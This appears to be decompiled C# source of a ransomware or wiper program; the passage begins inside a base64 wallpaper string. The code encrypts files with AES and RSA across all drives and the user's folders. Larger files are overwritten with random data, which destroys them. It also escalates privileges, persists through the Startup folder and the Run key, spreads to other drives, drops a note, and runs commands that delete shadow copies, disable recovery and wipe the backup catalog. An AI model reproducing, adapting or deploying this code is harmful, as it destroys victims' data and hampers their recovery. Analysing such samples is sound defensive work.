kOe0EgHxa1ZjtM1yR8fQCVszf0eq+JowzPhzIvoyImSg+61nCn1SLT9SxI9/iQhslV0I/Kw4NNONnDOyHMnjvhNaehPp16sGnZ2TE+aHGe6JjS4vqhQ2hrj9LSVp2mz6lNwYXxtP/ADcB/geVh4eG3UDhak6UES8L5KAu6skriDQNbkibCwsbK2nPFuDD+Cvih2QzUZInTPMDg2SNt/KAQsDIGLm4uQ4W2OVrj+gV8TYjmZxzYvmx8kB7Xt6i66halNuaFpGJKf8AXBdJXkM8WszO0nU4MWfLkmZlRRhj2sbe/Xus3WjmYkOIcSINiBax5suA9kMidsRhbO8Rn/YHGvuKJXw1lSQanHizOdwp2Oicx111HTov6WCPLkhzs5uNcrmRgtJc4XQPsFLpEmNq8OmTPBD3sAeOxa7ytSz8nTdSlxsJ3BhgcGtY0CnUO7vza1MQxjSNfxIxHxXNMjG9BvtXxNDwtUblQ/RkMZKwj8r4lxJsiPB1Rsf1Y7RN2+Vw/Ky8jStUwMCXJzTDlQR8N7Qwuc8BO3d525e7Zq+9KHUM6CPgxZMjY++7fRSSSSvMkry957lxsqlSpV6wBKDQnNo88Gn5v9dgZGjRRyOc0mZ1NL9++3zeFqT8+HPgzMvEMEw3DdU1zmeQvill5uPnMvh5MDJAfcBam+WbC0PWoGkyRtDHkC/mYfK1ZmLrD2ajh5MTJXtAmileGEOHkX3Wo5kX8DA0qCQSCAue947F7vA9gma7nsxY8S43Nj6RuewOez9Ep80sgAkkc4C6BJIF+oAhSO6ER5HKGlBoG13Uc+n4+S/Clnwc4xSskDXsMnDDgR0INhZ+dK7S2YWbkCfJ44eCHB5YwDsSFmavj5GDjYIw94QM3WSyO+YX7NTtUznQNxhOWQgVuM+Uf+euFvLeKPWigLRFbA0qgOXv0R5uoHQrqq+wHbY0WgPddUQO5XQclq1atO7898tbKVKlXONjTSBRtO8K/Qd2HoVsv1a2A2ghRAFrqnG1YVjZuqj+ESArKs+vav0gh+kQgSOxQp3cJ7K6jtsBX1BFpCN8g2HmvkrmvmCZ3KIsIsITbFlAhwTmEWQh5TUU8edoXlHnrZfLXPewId0NoIaSCKVgjoVSb22P7cnnYPSvlrnCCauv5Ve+ygUQSShY8oHpaf2P2V81cg/GxpIQs9ztKJo2qXb9J3Y8h2H1r9O/dBxQerC7ik0+Dsf25DsKGw/aD8ba22V9Qvymmwn9kUNh5TsHoV6H/9k=";

	public static string appMutexStartup = "1qw0ll8p9m8uezhqhyd";

	private static string droppedMessageTextbox = "read_it.txt";

	private static bool checkAdminPrivilage = false;

	private static bool checkdeleteShadowCopies = false;

	private static bool checkdisableRecoveryMode = false;

	private static bool checkdeleteBackupCatalog = false;

	public static string appMutexStartup2 = "17CqMQFeuB3NTzJ";

	public static string appMutex2 = appMutexStartup2 + appMutexRun2;

	public static string staticSplit = "bc";

	public static string appMutex = staticSplit + appMutexStartup + appMutexRun;

	public static readonly Regex appMutexRegex = new Regex("(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})");

	private static string[] messages = new string[7] { "Just testing stuff for research reasons.", "", "Shoutout to some great users I follow", "@doc_guard", "@banthisguy9349", "@Gi7w0rm", "@malwrhunterteam" };

	private static string[] validExtensions = new string[229]
	{
		".txt", ".jar", ".dat", ".contact", ".settings", ".doc", ".docx", ".xls", ".xlsx", ".ppt",
		".pptx", ".odt", ".jpg", ".mka", ".mhtml", ".oqy", ".png", ".csv", ".py", ".sql",
		".mdb", ".php", ".asp", ".aspx", ".html", ".htm", ".xml", ".psd", ".pdf", ".xla",
		".cub", ".dae", ".indd", ".cs", ".mp3", ".mp4", ".dwg", ".zip", ".rar", ".mov",
		".rtf", ".bmp", ".mkv", ".avi", ".apk", ".lnk", ".dib", ".dic", ".dif", ".divx",
		".iso", ".7zip", ".ace", ".arj", ".bz2", ".cab", ".gzip", ".lzh", ".tar", ".jpeg",
		".xz", ".mpeg", ".torrent", ".mpg", ".core", ".pdb", ".ico", ".pas", ".db", ".wmv",
		".swf", ".cer", ".bak", ".backup", ".accdb", ".bay", ".p7c", ".exif", ".vss", ".raw",
		".m4a", ".wma", ".flv", ".sie", ".sum", ".ibank", ".wallet", ".css", ".js", ".rb",
		".crt", ".xlsm", ".xlsb", ".7z", ".cpp", ".java", ".jpe", ".ini", ".blob", ".wps",
		".docm", ".wav", ".3gp", ".webm", ".m4v", ".amv", ".m4p", ".svg", ".ods", ".bk",
		".vdi", ".vmdk", ".onepkg", ".accde", ".jsp", ".json", ".gif", ".log", ".gz", ".config",
		".vb", ".m1v", ".sln", ".pst", ".obj", ".xlam", ".djvu", ".inc", ".cvs", ".dbf",
		".tbi", ".wpd", ".dot", ".dotx", ".xltx", ".pptm", ".potx", ".potm", ".pot", ".xlw",
		".xps", ".xsd", ".xsf", ".xsl", ".kmz", ".accdr", ".stm", ".accdt", ".ppam", ".pps",
		".ppsm", ".1cd", ".3ds", ".3fr", ".3g2", ".accda", ".accdc", ".accdw", ".adp", ".ai",
		".ai3", ".ai4", ".ai5", ".ai6", ".ai7", ".ai8", ".arw", ".ascx", ".asm", ".asmx",
		".avs", ".bin", ".cfm", ".dbx", ".dcm", ".dcr", ".pict", ".rgbe", ".dwt", ".f4v",
		".exr", ".kwm", ".max", ".mda", ".mde", ".mdf", ".mdw", ".mht", ".mpv", ".msg",
		".myi", ".nef", ".odc", ".geo", ".swift", ".odm", ".odp", ".oft", ".orf", ".pfx",
		".p12", ".pl", ".pls", ".safe", ".tab", ".vbs", ".xlk", ".xlm", ".xlt", ".xltm",
		".svgz", ".slk", ".tar.gz", ".dmg", ".ps", ".psb", ".tif", ".rss", ".key", ".vob",
		".epsp", ".dc3", ".iff", ".onepkg", ".onetoc2", ".opt", ".p7b", ".pam", ".r3d"
	};

	private static Random random = new Random();

	[DllImport("user32.dll", CharSet = CharSet.Auto)]
	private static extern int SystemParametersInfo(uint action, uint uParam, string vParam, uint winIni);

	private static void Main(string[] args)
	{
		if (AlreadyRunning())
		{
			Environment.Exit(1);
		}
		if (checkSleep)
		{
			sleepOutOfTempFolder();
		}
		if (checkAdminPrivilage)
		{
			copyResistForAdmin(processName);
		}
		else if (checkCopyRoaming)
		{
			copyRoaming(processName);
		}
		if (checkStartupFolder)
		{
			addLinkToStartup();
		}
		lookForDirectories();
		if (checkAdminPrivilage)
		{
			if (checkdeleteShadowCopies)
			{
				deleteShadowCopies();
			}
			if (checkdisableRecoveryMode)
			{
				disableRecoveryMode();
			}
			if (checkdeleteBackupCatalog)
			{
				deleteBackupCatalog();
			}
		}
		if (checkSpread)
		{
			spreadIt(spreadName);
		}
		addAndOpenNote();
		SetWallpaper(base64Image);
		new Thread((ThreadStart)delegate
		{
			Run();
		}).Start();
	}

	public static void Run()
	{
		Application.Run((Form)(object)new driveNotification.NotificationForm());
	}

	private static void sleepOutOfTempFolder()
	{
		string directoryName = Path.GetDirectoryName(Assembly.GetEntryAssembly().Location);
		string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
		if (directoryName != folderPath)
		{
			Thread.Sleep(sleepTextbox * 1000);
		}
	}

	private static bool AlreadyRunning()
	{
		Process[] processes = Process.GetProcesses();
		Process currentProcess = Process.GetCurrentProcess();
		Process[] array = processes;
		foreach (Process process in array)
		{
			try
			{
				if (process.Modules[0].FileName == Assembly.GetExecutingAssembly().Location && currentProcess.Id != process.Id)
				{
					return true;
				}
			}
			catch (Exception)
			{
			}
		}
		return false;
	}

	public static byte[] random_bytes(int length)
	{
		Random random = new Random();
		length++;
		byte[] array = new byte[length];
		random.NextBytes(array);
		return array;
	}

	public static string RandomString(int length)
	{
		StringBuilder stringBuilder = new StringBuilder();
		for (int i = 0; i < length; i++)
		{
			char value = "abcdefghijklmnopqrstuvwxyz0123456789"[random.Next(0, "abcdefghijklmnopqrstuvwxyz0123456789".Length)];
			stringBuilder.Append(value);
		}
		return stringBuilder.ToString();
	}

	public static string RandomStringForExtension(int length)
	{
		if (encryptedFileExtension == "")
		{
			StringBuilder stringBuilder = new StringBuilder();
			for (int i = 0; i < length; i++)
			{
				char value = "abcdefghijklmnopqrstuvwxyz0123456789"[random.Next(0, "abcdefghijklmnopqrstuvwxyz0123456789".Length)];
				stringBuilder.Append(value);
			}
			return stringBuilder.ToString();
		}
		return encryptedFileExtension;
	}

	public static string Base64EncodeString(string plainText)
	{
		byte[] bytes = Encoding.UTF8.GetBytes(plainText);
		return Convert.ToBase64String(bytes);
	}

	public static string randomEncode(string plainText)
	{
		byte[] bytes = Encoding.UTF8.GetBytes(plainText);
		return "<EncyptedKey>" + Base64EncodeString(RandomString(41)) + "<EncyptedKey> " + RandomString(2) + Convert.ToBase64String(bytes);
	}

	private static void encryptDirectory(string location)
	{
		try
		{
			string[] files = Directory.GetFiles(location);
			bool flag = true;
			for (int i = 0; i < files.Length; i++)
			{
				try
				{
					string extension = Path.GetExtension(files[i]);
					string fileName = Path.GetFileName(files[i]);
					if (!Array.Exists(validExtensions, (string E) => E == extension.ToLower()) || !(fileName != droppedMessageTextbox))
					{
						continue;
					}
					FileInfo fileInfo = new FileInfo(files[i]);
					fileInfo.Attributes = FileAttributes.Normal;
					if (fileInfo.Length < 2117152)
					{
						if (encryptionAesRsa)
						{
							EncryptFile(files[i]);
						}
					}
					else if (fileInfo.Length > 200000000)
					{
						Random random = new Random();
						int length = random.Next(200000000, 300000000);
						string @string = Encoding.UTF8.GetString(random_bytes(length));
						File.WriteAllText(files[i], randomEncode(@string));
						File.Move(files[i], files[i] + "." + RandomStringForExtension(4));
					}
					else
					{
						string string2 = Encoding.UTF8.GetString(random_bytes(Convert.ToInt32(fileInfo.Length) / 4));
						File.WriteAllText(files[i], randomEncode(string2));
						File.Move(files[i], files[i] + "." + RandomStringForExtension(4));
					}
					if (flag)
					{
						flag = false;
						File.WriteAllLines(location + "/" + droppedMessageTextbox, messages);
					}
				}
				catch
				{
				}
			}
			string[] directories = Directory.GetDirectories(location);
			for (int j = 0; j < directories.Length; j++)
			{
				encryptDirectory(directories[j]);
			}
		}
		catch (Exception)
		{
		}
	}

	public static string rsaKey()
	{
		StringBuilder stringBuilder = new StringBuilder();
		stringBuilder.AppendLine("<?xml version=\"1.0\" encoding=\"utf-16\"?>");
		stringBuilder.AppendLine("<RSAParameters xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">");
		stringBuilder.AppendLine("  <Exponent>AQAB</Exponent>");
		stringBuilder.AppendLine("  <Modulus>ukDMw8uV46WkFPCTbb9vdaq8o/eRiutUGkIsYW4MQ9au5u5ic3p+iugYRPMwVh4RliQmjejAhB/6U/J5wnY8899BNZztvH9zAlXZERnHwCYICO3uasL8IwArQTF/bVak22ixWda96eG1dNPYABTGPawDJW6KrYVWxIwsJTjWEZ0=</Modulus>");
		stringBuilder.AppendLine("</RSAParameters>");
		return stringBuilder.ToString();
	}

	public static string CreatePassword(int length)
	{
		StringBuilder stringBuilder = new StringBuilder();
		Random random = new Random();
		while (0 < length--)
		{
			stringBuilder.Append("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/"[random.Next("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=&?&/".Length)]);
		}
		return stringBuilder.ToString();
	}

	public static byte[] AES_Encrypt(byte[] bytesToBeEncrypted, byte[] passwordBytes)
	{
		byte[] array = null;
		byte[] salt = new byte[8] { 1, 2, 3, 4, 5, 6, 7, 8 };
		using MemoryStream memoryStream = new MemoryStream();
		using RijndaelManaged rijndaelManaged = new RijndaelManaged();
		rijndaelManaged.KeySize = 256;
		rijndaelManaged.BlockSize = 128;
		Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000);
		rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
		rijndaelManaged.IV = rfc2898DeriveBytes.GetBytes(rijndaelManaged.BlockSize / 8);
		rijndaelManaged.Mode = CipherMode.CBC;
		using (CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(), CryptoStreamMode.Write))
		{
			cryptoStream.Write(bytesToBeEncrypted, 0, bytesToBeEncrypted.Length);
			cryptoStream.Close();
		}
		return memoryStream.ToArray();
	}

	public static void EncryptFile(string file)
	{
		byte[] bytesToBeEncrypted = File.ReadAllBytes(file);
		string text = CreatePassword(20);
		byte[] bytes = Encoding.UTF8.GetBytes(text);
		byte[] inArray = AES_Encrypt(bytesToBeEncrypted, bytes);
		File.WriteAllText(file, "<EncryptedKey>" + RSAEncrypt(text, rsaKey()) + "<EncryptedKey>" + Convert.ToBase64String(inArray));
		File.Move(file, file + "." + RandomStringForExtension(4));
	}

	public static string RSAEncrypt(string textToEncrypt, string publicKeyString)
	{
		byte[] bytes = Encoding.UTF8.GetBytes(textToEncrypt);
		using RSACryptoServiceProvider rSACryptoServiceProvider = new RSACryptoServiceProvider(1024);
		try
		{
			rSACryptoServiceProvider.FromXmlString(publicKeyString.ToString());
			byte[] inArray = rSACryptoServiceProvider.Encrypt(bytes, fOAEP: true);
			return Convert.ToBase64String(inArray);
		}
		finally
		{
			rSACryptoServiceProvider.PersistKeyInCsp = false;
		}
	}

	private static void lookForDirectories()
	{
		DriveInfo[] drives = DriveInfo.GetDrives();
		foreach (DriveInfo driveInfo in drives)
		{
			if (driveInfo.ToString() != "C:\\")
			{
				encryptDirectory(driveInfo.ToString());
			}
		}
		string location = userDir + userName + "\\Desktop";
		string location2 = userDir + userName + "\\Links";
		string location3 = userDir + userName + "\\Contacts";
		string location4 = userDir + userName + "\\Desktop";
		string location5 = userDir + userName + "\\Documents";
		string location6 = userDir + userName + "\\Downloads";
		string location7 = userDir + userName + "\\Pictures";
		string location8 = userDir + userName + "\\Music";
		string location9 = userDir + userName + "\\OneDrive";
		string location10 = userDir + userName + "\\Saved Games";
		string location11 = userDir + userName + "\\Favorites";
		string location12 = userDir + userName + "\\Searches";
		string location13 = userDir + userName + "\\Videos";
		encryptDirectory(location);
		encryptDirectory(location2);
		encryptDirectory(location3);
		encryptDirectory(location4);
		encryptDirectory(location5);
		encryptDirectory(location6);
		encryptDirectory(location7);
		encryptDirectory(location8);
		encryptDirectory(location9);
		encryptDirectory(location10);
		encryptDirectory(location11);
		encryptDirectory(location12);
		encryptDirectory(location13);
		encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData));
		encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments));
		encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures));
		encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic));
		encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos));
		encryptDirectory(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory));
	}

	private static void copyRoaming(string processName)
	{
		string friendlyName = AppDomain.CurrentDomain.FriendlyName;
		string location = Assembly.GetExecutingAssembly().Location;
		_ = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + friendlyName;
		string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\";
		string text2 = text + processName;
		if (!(friendlyName != processName) && !(location != text2))
		{
			return;
		}
		if (!File.Exists(text2))
		{
			File.Copy(friendlyName, text2);
			ProcessStartInfo processStartInfo = new ProcessStartInfo(text2);
			processStartInfo.WorkingDirectory = text;
			Process process = new Process();
			process.StartInfo = processStartInfo;
			if (process.Start())
			{
				Environment.Exit(1);
			}
			return;
		}
		try
		{
			File.Delete(text2);
			Thread.Sleep(200);
			File.Copy(friendlyName, text2);
		}
		catch
		{
		}
		ProcessStartInfo processStartInfo2 = new ProcessStartInfo(text2);
		processStartInfo2.WorkingDirectory = text;
		Process process2 = new Process();
		process2.StartInfo = processStartInfo2;
		if (process2.Start())
		{
			Environment.Exit(1);
		}
	}

	private static void copyResistForAdmin(string processName)
	{
		string friendlyName = AppDomain.CurrentDomain.FriendlyName;
		string location = Assembly.GetExecutingAssembly().Location;
		_ = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + friendlyName;
		string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\";
		string text2 = text + processName;
		ProcessStartInfo processStartInfo = new ProcessStartInfo(text2);
		processStartInfo.UseShellExecute = true;
		processStartInfo.Verb = "runas";
		processStartInfo.WindowStyle = ProcessWindowStyle.Normal;
		processStartInfo.WorkingDirectory = text;
		ProcessStartInfo startInfo = processStartInfo;
		Process process = new Process();
		process.StartInfo = startInfo;
		if (!(friendlyName != processName) && !(location != text2))
		{
			return;
		}
		if (!File.Exists(text2))
		{
			File.Copy(friendlyName, text2);
			try
			{
				Process.Start(startInfo);
				Environment.Exit(1);
				return;
			}
			catch (Win32Exception ex)
			{
				if (ex.NativeErrorCode == 1223)
				{
					copyResistForAdmin(processName);
				}
				return;
			}
		}
		try
		{
			File.Delete(text2);
			Thread.Sleep(200);
			File.Copy(friendlyName, text2);
		}
		catch
		{
		}
		try
		{
			Process.Start(startInfo);
			Environment.Exit(1);
		}
		catch (Win32Exception ex2)
		{
			if (ex2.NativeErrorCode == 1223)
			{
				copyResistForAdmin(processName);
			}
		}
	}

	private static void addLinkToStartup()
	{
		string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup);
		string text = Process.GetCurrentProcess().ProcessName;
		using StreamWriter streamWriter = new StreamWriter(folderPath + "\\" + text + ".url");
		string location = Assembly.GetExecutingAssembly().Location;
		streamWriter.WriteLine("[InternetShortcut]");
		streamWriter.WriteLine("URL=file:///" + location);
		streamWriter.WriteLine("IconIndex=0");
		string text2 = location.Replace('\\', '/');
		streamWriter.WriteLine("IconFile=" + text2);
	}

	private static void addAndOpenNote()
	{
		string text = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + droppedMessageTextbox;
		try
		{
			File.WriteAllLines(text, messages);
			Thread.Sleep(500);
			Process.Start(text);
		}
		catch
		{
		}
	}

	private static void registryStartup()
	{
		try
		{
			RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", writable: true);
			registryKey.SetValue("Microsoft Store", Assembly.GetExecutingAssembly().Location);
		}
		catch
		{
		}
	}

	private static void spreadIt(string spreadName)
	{
		DriveInfo[] drives = DriveInfo.GetDrives();
		foreach (DriveInfo driveInfo in drives)
		{
			if (driveInfo.ToString() != "C:\\" && !File.Exists(driveInfo.ToString() + spreadName))
			{
				try
				{
					File.Copy(Assembly.GetExecutingAssembly().Location, driveInfo.ToString() + spreadName);
				}
				catch
				{
				}
			}
		}
	}

	private static void runCommand(string commands)
	{
		Process process = new Process();
		ProcessStartInfo processStartInfo = new ProcessStartInfo();
		processStartInfo.FileName = "cmd.exe";
		processStartInfo.Arguments = "/C " + commands;
		processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
		process.StartInfo = processStartInfo;
		process.Start();
		process.WaitForExit();
	}

	private static void deleteShadowCopies()
	{
		runCommand("vssadmin delete shadows /all /quiet & wmic shadowcopy delete");
	}

	private static void disableRecoveryMode()
	{
		runCommand("bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no");
	}

	private static void deleteBackupCatalog()
	{
		runCommand("wbadmin delete catalog -quiet");
	}

	public static void SetWallpaper(string base64)
	{
		if (base64 != "")
		{
			try
			{
				string text = Path.GetTempPath() + RandomString(9) + ".jpg";
				File.WriteAllBytes(text, Convert.FromBase64String(base64));
				SystemParametersInfo(20u, 0u, text, 3u);
			}
			catch
			{
			}
		}
	}
}
